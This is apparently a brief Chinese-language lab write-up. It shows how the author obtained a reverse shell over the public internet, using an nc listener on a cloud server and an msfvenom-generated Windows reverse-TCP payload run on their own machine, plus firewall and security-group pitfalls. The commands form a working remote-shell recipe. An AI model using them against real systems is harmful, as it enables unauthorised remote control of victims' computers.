前置内容
一直认为reverse shell只有在局域网中才能获取(虽然按原理来看只要attacker能够收到victim的请求就可以建立reverse shell,不需要在意attacker与victim是否处于一个局域网)
但直到今天才在公网中获取到reverse shell
实验环境:
一台windows10主机(victim): 192.168.76.66
一台云服务器centos主机(attacker): 8.130.xx.xxx
一台kali虚拟机: 利用msfvenom生成payload
实验过程
centos上:
# yum install -y nc
# nc -nvlp 3000
kali上:
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=8.130.xx.xxx LPORT=3000 -f exe -o /root/test.exe
win10主机上:
运行kali上生成的payload
踩坑点
- centos上的防火墙的3000端口未打开
- 阿里云服务器的安全组策略中的3000端口没有显式开放!!!!(很重要)